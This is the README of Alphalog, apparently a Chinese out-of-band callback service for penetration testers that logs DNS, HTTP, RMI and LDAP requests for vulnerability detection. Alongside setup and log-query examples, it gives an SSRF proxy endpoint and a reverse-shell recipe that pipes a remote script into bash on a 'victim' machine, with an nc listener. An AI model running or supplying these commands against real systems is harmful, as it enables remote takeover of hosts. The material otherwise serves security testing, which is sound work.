Home

Awesome

Alphalog

DNSLog、httplog、rmilog、ldaplog、jndi 等都支持,完全匿名 ,Alphalog与传统DNSLog不同,更快、更安全。

patch 内容

update了前端展示,增加了DNS外带功能。支持极端条件下命令执行结果通过dns外带 >>> demo

<img width="1955" alt="image" src="https://user-images.githubusercontent.com/13174906/228754119-0c61631e-d067-44e7-bafb-d6410989125d.png">

image

  $$$$$$\  $$\           $$\                 $$\                          
 $$  __$$\ $$ |          $$ |                $$ |                         
 $$ /  $$ |$$ | $$$$$$\  $$$$$$$\   $$$$$$\  $$ |      $$$$$$\   $$$$$$\  
 $$$$$$$$ |$$ |$$  __$$\ $$  __$$\  \____$$\ $$ |     $$  __$$\ $$  __$$\ 
 $$  __$$ |$$ |$$ /  $$ |$$ |  $$ | $$$$$$$ |$$ |     $$ /  $$ |$$ /  $$ |
 $$ |  $$ |$$ |$$ |  $$ |$$ |  $$ |$$  __$$ |$$ |     $$ |  $$ |$$ |  $$ |
 $$ |  $$ |$$ |$$$$$$$  |$$ |  $$ |\$$$$$$$ |$$$$$$$$\\$$$$$$  |\$$$$$$$ |
 \__|  \__|\__|$$  ____/ \__|  \__| \_______|\________|\______/  \____$$ |
               $$ |                                             $$\   $$ |
               $$ |                 By:Alphabug                 \$$$$$$  |
               \__|                 Version:0.2022.01.16.01      \______/

Welcome to alphalog

image

Install

  1. 系统环境
  1. 创建config.yaml文件 内容如下
domain: alphabug.cn
IP_DNS: VPS地址
IP_JNDI: VPS地址
database: redis:Redis数据库地址:端口:密码
PORT_HTTP: HTTPLOG端口
PORT_JNDI: RMI/LDAP端口

例如

domain: alphabug.cn
IP_DNS: 192.168.1.7
IP_JNDI: 192.168.1.7
database: redis:192.168.1.3:6379:Alphabug
PORT_HTTP: 80
PORT_JNDI: 5
  1. Run
E:\Code\GolandProjects\Alphalog\output> Alphalog_windows_amd64.exe

  $$$$$$\  $$\           $$\                 $$\
 $$  __$$\ $$ |          $$ |                $$ |
 $$ /  $$ |$$ | $$$$$$\  $$$$$$$\   $$$$$$\  $$ |      $$$$$$\   $$$$$$\
 $$$$$$$$ |$$ |$$  __$$\ $$  __$$\  \____$$\ $$ |     $$  __$$\ $$  __$$\
 $$  __$$ |$$ |$$ /  $$ |$$ |  $$ | $$$$$$$ |$$ |     $$ /  $$ |$$ /  $$ |
 $$ |  $$ |$$ |$$ |  $$ |$$ |  $$ |$$  __$$ |$$ |     $$ |  $$ |$$ |  $$ |
 $$ |  $$ |$$ |$$$$$$$  |$$ |  $$ |\$$$$$$$ |$$$$$$$$\\$$$$$$  |\$$$$$$$ |
 \__|  \__|\__|$$  ____/ \__|  \__| \_______|\________|\______/  \____$$ |
               $$ |                                             $$\   $$ |
               $$ |                 By:Alphabug                 \$$$$$$  |
               \__|                 Version:1.0.0.Releases       \______/
2022/04/30 20:40:09 [Config] Redis Initialization succeeded
2022/04/30 20:40:09 [DNS] Domain: alphabug.cn
2022/04/30 20:40:09 [Redis] Start redis database init
2022/04/30 20:40:09 [DNS] Initialization succeeded
2022/04/30 20:40:09 [JNDI] Start fake reverse server

Usage

  1. Get token(key) and randomly named subdomain (Expires: 1 Day)

    $ curl fuzz.red/get
    {"key":"63d755be-9683-40a9-91fb-b85890155872","subdomain":"oz4e.fuzz.red"}
    
  2. Get logs

    $ curl fuzz.red -X POST -d "key=63d755be-9683-40a9-91fb-b85890155872"
    {"code":200,"data":[]}
    

DNSLOG

ping -c 1 oz4e.fuzz.red
$ curl fuzz.red -X POST -d "key=63d755be-9683-40a9-91fb-b85890155872"
{"code":200,"data":["{\"ip\":\"192.168.1.1\",\"reqbody\":[\"\"],\"subdomain\":\"oz4e.fuzz.red.\",\"time\":\"2022-01-14 17:01:17 +0800 CST\",\"type\":\"dns\"}"]} 

HTTPLOG

curl oz4e.fuzz.red -d "abc"
$ curl fuzz.red -X POST -d "key=63d755be-9683-40a9-91fb-b85890155872" | python -m json.tool
{
"code": 200,
"data": [
	{...}]
}

SSRF

$ curl -L fuzz.red/ssrf/www.baidu.com/
<!DOCTYPE html>...(www.baidu.com page)...</html>

反弹shell

$ curl fuzz.red/sh4ll/ip:port

Victim

$ curl fuzz.red/sh4ll/1.2.3.4:1234 | bash
# or 
$ curl fuzz.red/sh4ll/1.2.3.4:1234 | sh

VPS

$ nc -lvvp 1234
listening on [any] 1234 ...
connect to [1.2.3.4] from fbi.gov [127.0.0.1] 46958

RMI or LDAP

PATH规则为“sub/text”,sub为子域名的主机头,text为自定义特征 例如:子域名=oz4e.fuzz.red,text=Alphabug => oz4e/Alphabug

rmi://jndi.fuzz.red:5/oz4e/Alphabug
# or
ldap://jndi.fuzz.red:5/oz4e/Alphabug

获取log

$ curl fuzz.red -X POST -d "key=63d755be-9683-40a9-91fb-b85890155872" | python -m json.tool

{
	"code": 200,
	"data": [
		{
			"ip": "1.2.3.4:41584",
			"reqbody": "Alphabug",
			"subdomain": "oz4e.fuzz.red.",
			"time": "2022-01-16 03:40:03 -0500 EST",
			"type": "ldap"
		}
	]
}

作者有话说

项目名称为:Alphalog,作者Alphabug。

采用Go编写开发 DNS服务、Http服务等,后续等待开源。

项目域名为匿名域名,请求接口没有做任何的记录。所有dnslog存活时间为1天,大家可以亲测。

(请勿CC/DDos,服务器特别贵,可能没办法退钱)

项目日志:

curl 效果日志

image

www.fuzz.red 效果

www fuzz red_(iPhone X)

image

Stargazers over time

Stargazers over time

实时反馈群

QQ反馈群

QQ群:727871590

$XVJBS5Q 5QNTDURQ(AKGU6

2022.04.11